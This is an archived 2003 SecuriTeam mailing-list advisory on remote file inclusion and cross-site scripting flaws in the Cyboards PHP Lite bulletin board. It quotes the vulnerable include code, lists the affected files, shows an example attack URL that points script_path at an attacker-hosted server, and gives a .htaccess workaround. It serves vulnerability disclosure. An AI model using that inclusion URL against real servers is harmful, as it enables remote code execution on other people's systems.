[UNIX] Cyboards Remote Code Execution and XSS

From: support@securiteam.com
Date: 01/22/03

  • Next message: support@securiteam.com: "[NEWS] Blackboard Password Retrieval (search.pl)" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 22 Jan 2003 23:20:30 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Cyboards Remote Code Execution and XSS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.gold-sonata.com> Cyboards PHP Lite is a free open-source
    bulletin board programmed in PHP. A couple of vulnerabilities exist in the
    /include directory which results in allowing an attacker to execute remote
    code on the server with web server's permission setting. Another
    vulnerability that can be found in /include directory allows an attacker
    to hijack other member's accounts using an XSS attack.

    DETAILS

    Vulnerable systems:
     * Cyboards version 1.25 and prior

    Cross Site Scripting:
    It is possible in the following files:
    include/default_header.php
    include/options_form.php
    adminopts/login_form.php
    adminopts/include/ban_form.php
    adminopts/include/board_form.php
    adminopts/include/login_form.php
    adminopts/include/vip_form.php

    To cause each one of them to return malicious HTML and JavaScript code.

    Remote Arbitrary Code Execution:
    In a couple of files inside the include directory the PHP files do not
    check safely for inclusion and allow remote users to call them directly.
    This problem would allow a remote attacker to include their own remote
    arbitrary code and cause the remote server to run it.

    1. include/default_header.php
    This file looks something like this
    .

    if(isset($board_config["style***"])&&(trim($board_config["style***"])!="")) {
      echo "<LINK REL=STYLE*** HREF='".$board_config["style***"]."'
    TYPE='text/css'>\n\n";
    } else {
      echo "<style>\n";
      include("$script_path/include/default_style.css");
      echo "\n</style>";
    }

    .

    By default, $board_config["style***"] is not set since it has not been
    included inside another forum file. This means that
    include("$script_path/include/default_style.css"); will be executed. By
    creating a directory called include on the attacker's server and placing
    the desired code inside default_style.css, an attacker can trick the
    inclusion and make it include the wrong CSS file. By doing so, PHP will
    execute the attackers code. The URI would look something like this:

    http://victim/forum/include/default_header.php?script_path=http://attacker

    Where the attacker has created a directory called /include and inside a
    file called default_style.css which contains the malicious code.

    2. include/options_form.php
    The file contains the following code on its first line:

    <? include("$script_path/lang/$lang_code/".$lang_code."_options.php"); ?>

    Note: An attacker can use this for a XSS attack as well, but given the
    possibility of running remote code on the server it is more probable
    he/she will use it for remote code execution.

    Solution:
    Please check the vendor's website for new patches.

    As a temporary solution, create an .htaccess file that contains 'Deny from
    all'. Place it in the /include directory and that should block remote
    users from accessing it.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:mindwarper@hush.com>
    Mindwarper.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages